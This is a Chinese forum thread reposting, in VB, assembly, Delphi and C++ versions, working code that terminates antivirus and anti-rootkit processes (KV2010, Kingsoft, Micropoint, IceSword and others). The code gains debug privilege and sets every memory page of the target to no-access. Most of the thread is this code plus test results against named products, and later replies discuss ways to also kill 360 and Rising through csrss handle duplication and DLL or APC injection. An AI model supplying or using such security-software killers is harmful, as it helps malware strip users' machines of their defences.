[翻译+转载]无驱动杀死KV2010/金山2011/微点-1.2/冰刃/狙剑/天琊

HoviDelphic

更新内容：
2010-7-21：发现这玩意还能杀死微点，我手头上测试的微点是2010年4月20日编译的（直接用以前下载的版本，没有下载最新版测试）。
2010-7-31：发现此程序无法结束瑞星2009！测试杀瑞星2010是在同学的机子上进行的，不排除他看到SSDT一片红，误以为是病毒干的，就拿冰刃把SSDT全恢复了。

首先感谢Zzzians(syf)，提出了使用VirtualProtect破坏进程内存。
其次感谢他的朋友EXTREME，写了核心代码让我参考：http://hi.baidu.com/q_lai_a_qu/blog/item/fa92a982185ca7b26c81193a.html

'//////////////////////////////
'Code by Tesla.Angela(GDUT.HWL)
'Thank to Syf & q_lai_a_qu
'//////////////////////////////
Option Explicit
Private Type SYSTEM_INFO
    dwOemID As Long
    dwPageSize As Long
    lpMinimumApplicationAddress As Long
    lpMaximumApplicationAddress As Long
    dwActiveProcessorMask As Long
    dwNumberOrfProcessors As Long
    dwProcessorType As Long
    dwAllocationGranularity As Long
    dwReserved As Long
End Type
Private Type MEMORY_BASIC_INFORMATION
    BaseAddress As Long
    AllocationBase As Long
    AllocationProtect As Long
    RegionSize As Long
    State As Long
    Protect As Long
    lType As Long
End Type
Private Declare Function RtlAdjustPrivilege Lib "ntdll" _
                        (ByVal a As Long, _
                        ByVal b As Long, _
                        ByVal c As Long, _
                        ByRef d As Long) As Long
Private Declare Function VirtualQueryEx Lib "kernel32.dll" _
                        (ByVal hProcess As Long, _
                        ByRef lpAddress As Any, _
                        ByRef lpBuffer As MEMORY_BASIC_INFORMATION, _
                        ByVal dwLength As Long) As Long
Private Declare Function VirtualProtectEx Lib "kernel32.dll" _
                        (ByVal hProcess As Long, _
                        ByRef lpAddress As Any, _
                        ByVal dwSize As Long, _
                        ByVal flNewProtect As Long, _
                        ByRef lpflOldProtect As Long) As Long
Private Declare Function CloseHandle Lib "kernel32.dll" _
                        (ByVal hObject As Long) As Long
                        
Private Declare Sub GetSystemInfo Lib "kernel32.dll" _
                        (ByRef lpSystemInfo As SYSTEM_INFO)
                        
Private Const PROCESS_VM_READ As Long = (&H10)
Private Const PROCESS_VM_OPERATION As Long = (&H8)
Private Const PROCESS_QUERY_INFORMATION As Long = (&H400)
Private Const PAGE_NOACCESS As Long = &H1
Private Sub VmpKillProcess(ByVal PID As Long)
    Dim MaxAddr As Long, MinAddr As Long, CurAddr As Long, PageSize As Long, OldProtect As Long, hProc As Long
    Dim SysInfo As SYSTEM_INFO
    Dim MemBasicInfo As MEMORY_BASIC_INFORMATION
    Call GetSystemInfo(SysInfo)
    MinAddr = SysInfo.lpMinimumApplicationAddress
    MaxAddr = SysInfo.lpMaximumApplicationAddress
    PageSize = SysInfo.dwPageSize
    hProc = OpenProcess(PROCESS_VM_OPERATION Or PROCESS_QUERY_INFORMATION, False, PID)
    For CurAddr = MinAddr To MaxAddr Step PageSize
        If (VirtualQueryEx(hProc, ByVal CurAddr, MemBasicInfo, 28)) Then
            Call VirtualProtectEx(hProc, ByVal MemBasicInfo.BaseAddress, MemBasicInfo.RegionSize, PAGE_NOACCESS, OldProtect)
        End If
    Next
    Call CloseHandle(hProc)
End Sub
Public Sub Main()
    RtlAdjustPrivilege 20, 1, 0, 0
    Call VmpKillProcess(CLng(InputBox("PID=", "SyfKillProcess")))
End Sub

记住使用复制句柄的方式打开进程，以及要获得SE_DEBUG权限。

HoviDelphic

顺便装一下B，贴出我翻译的ASM代码：

.386
.model flat, stdcall
option casemap :none

include windows.inc
include user32.inc
include kernel32.inc
include masm32.inc

includelib user32.lib
includelib kernel32.lib
includelib masm32.lib
include macro.asm

.data
    NtDllDll db 'NTDLL.DLL',0
    GetDebug db 'RtlAdjustPrivilege',0
   
.code
START:
    getp proc
        local hNtdll:DWORD
        local pRtlAdjustPrivilege:DWORD
        local rtv:DWORD
        invoke LoadLibrary,offset NtDllDll
        mov hNtdll,eax
        invoke GetProcAddress,hNtdll,offset GetDebug
        mov pRtlAdjustPrivilege,eax
        ;RtlAdjustPrivilege(20,1,0,VarPtr(rtv))
        lea eax,rtv
        push eax
        push 0
        push 1
        push 20
        call pRtlAdjustPrivilege
    getp endp
    vpkp proc
        local MaxAddr:DWORD
        local MinAddr:DWORD
        local CurAddr:DWORD
        local PageSize:DWORD
        local OldProtect:DWORD
        local PID:DWORD
        local hProc:DWORD
        local VirtualQueryExRt:DWORD
        local SysInfo:SYSTEM_INFO
        local MemBasicInfo:MEMORY_BASIC_INFORMATION
        mov eax,8888 ;这里是待杀死进程的PID
        mov PID,eax
        invoke GetSystemInfo,addr SysInfo
        mov eax,SysInfo.lpMinimumApplicationAddress
        mov MinAddr,eax
        mov eax,MinAddr
        mov CurAddr,eax
        mov eax,SysInfo.lpMaximumApplicationAddress
        mov MaxAddr,eax
        mov ebx,MaxAddr
        mov eax,SysInfo.dwPageSize
        mov PageSize,eax
        invoke OpenProcess,PROCESS_ALL_ACCESS,FALSE,PID
        mov hProc,eax
        .while CurAddr <= ebx
            invoke VirtualQueryEx,hProc,CurAddr,addr MemBasicInfo,sizeof MEMORY_BASIC_INFORMATION
            mov VirtualQueryExRt,eax            
            .if VirtualQueryExRt!=0
                invoke VirtualProtectEx,hProc,MemBasicInfo.BaseAddress,MemBasicInfo.RegionSize,PAGE_NOACCESS,addr OldProtect
            .endif
            mov ecx,CurAddr
            mov edx,PageSize
            add ecx,edx
            mov CurAddr,ecx
            mov ebx,MaxAddr
        .endw
        invoke CloseHandle,hProc
    vpkp endp
    invoke ExitProcess,0   
end START

HoviDelphic

转载：9908006 写的Delphi版代码

function GetMemoryRegion(pid: dword): Boolean;
var
   TempStartAddress: DWord;
   TempEndAddress: DWord;
   OldProtect: dword;
   ProcHandle: dword;
   MBI: _MEMORY_BASIC_INFORMATION; //---------------------------内存信息变量
begin
   Result := False;
   ProcHandle := OpenProcess(PROCESS_ALL_ACCESS, false, pid);
  if ProcHandle = 0 then ProcHandle := fcopenprocess(pid);
  if ProcHandle = 0 then ProcHandle := myopenprocess(pid);

   TempStartAddress := 1 * 1024 * 1024; //$100000
   TempEndAddress := 2 * 1024 * 1024; //$200000
   TempEndAddress := TempEndAddress * 1024; //$40000000
  while (VirtualQueryEx(ProcHandle,
    pointer(TempStartAddress),
     MBI,
     sizeof(MBI)) > 0) and (TempStartAddress < TempEndAddress) do
  begin
    if (MBI.State = MEM_COMMIT) then
    begin
      if (MBI.Protect = PAGE_READWRITE) or
         (MBI.Protect = PAGE_WRITECOPY) or
         (MBI.Protect = PAGE_EXECUTE_READWRITE) or
         (MBI.Protect = PAGE_EXECUTE_WRITECOPY)
        then
      begin
         VirtualProtectEx(ProcHandle, MBI.BaseAddress, MBI.RegionSize, PAGE_NOACCESS, @OldProtect);
        //PMemoryRegion[MemoryRegionsIndex].BaseAddress := Dword(MBI.BaseAddress);
        //PMemoryRegion[MemoryRegionsIndex].MemorySize := MBI.RegionSize;
        //Inc(MemoryRegionsIndex);
      end;
    end;
     TempStartAddress := Dword(MBI.BaseAddress) + MBI.RegionSize;
  end;
   closehandle(prochandle);
   Result := True;
end;

HoviDelphic

转载：Q来A去写的原版c++代码

BOOL VPKillProc(DWORD PID)
{
    DWORD MaxAddr;
    DWORD CurAddr;
    DWORD PageSize;
    DWORD OldProtect;

    HANDLE hProc;

    SYSTEM_INFO SysInfo;
    MEMORY_BASIC_INFORMATION MemBasicInfo;
   
    GetSystemInfo(&SysInfo);
    MaxAddr = (DWORD)SysInfo.lpMaximumApplicationAddress;
    PageSize = SysInfo.dwPageSize;
    hProc = OpenProcess(PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION, FALSE, PID);

    for (CurAddr = (DWORD)SysInfo.lpMinimumApplicationAddress; CurAddr <= MaxAddr; CurAddr += PageSize)
    {

        //
        // Main loop: if the address is valid, make it unaccessible
        //

        if (VirtualQueryEx(hProc, (LPVOID)(CurAddr), &MemBasicInfo, sizeof(MEMORY_BASIC_INFORMATION)))
        {
            VirtualProtectEx(hProc, MemBasicInfo.BaseAddress, MemBasicInfo.RegionSize, PAGE_NOACCESS, &OldProtect);
            CurAddr += MemBasicInfo.RegionSize;
        }
    }

    //
    // Check if the process is dead
    //

    CloseHandle(hProc);
    if (OpenProcess(PROCESS_VM_READ, FALSE, PID))
    {
        CloseHandle(hProc);
        return FALSE;
    }

    return TRUE;
}

oopww

我是前来膜拜的，哈哈！

xbs2008

看看。学习。

9908006

有点好奇，看下是什么

9908006

大出血啊，这玩艺杀不死瑞星，虚假广告！哈哈

9908006

不会吧？我记得瑞星是不允许复制句柄的，它学了360，不允许从csrss中复制任何句柄，有测试瑞星最新版的童鞋没?

9908006

当然，如果注入csrss，再xxxx，是可以的，但如果360和瑞星装在一起，就无法注入csrss了，狼与狈的组合啊

fengerpro

360tray.exe能杀死就好了...............

Lgc小孩修电脑

这个...这个...貌似在6个月前看过..

xiaoly99

这个...这个...好像每次你发给我的说不要我发每次都会被你发出来...

8013

强悍！~··········

erwin

膜拜膜拜

wjwmz

不会吧？这个代码能够Kill这么多的东东？！
膜拜ZZZians

Tesla.Angela

不知道直接使用csrss里的句柄再加上这个VmpKillProcess能不能杀掉360。。。
naylon 发表于 2010-8-5 17:03

如果能注入到csrss并获得句柄，用这种方式杀360就不优美了。
优美的方式是插入dll，DllMain里来个DebugBreak，或者memcpy(3,2,1)。

Tesla.Angela

回复  Tesla.Angela

好像在360启动之后没法插DLL吧？
naylon 发表于 2010-8-8 10:19

R3貌似是无法插入了，Ring0用APC插入应该还可以吧。

kk1025

好資料 值得學習一下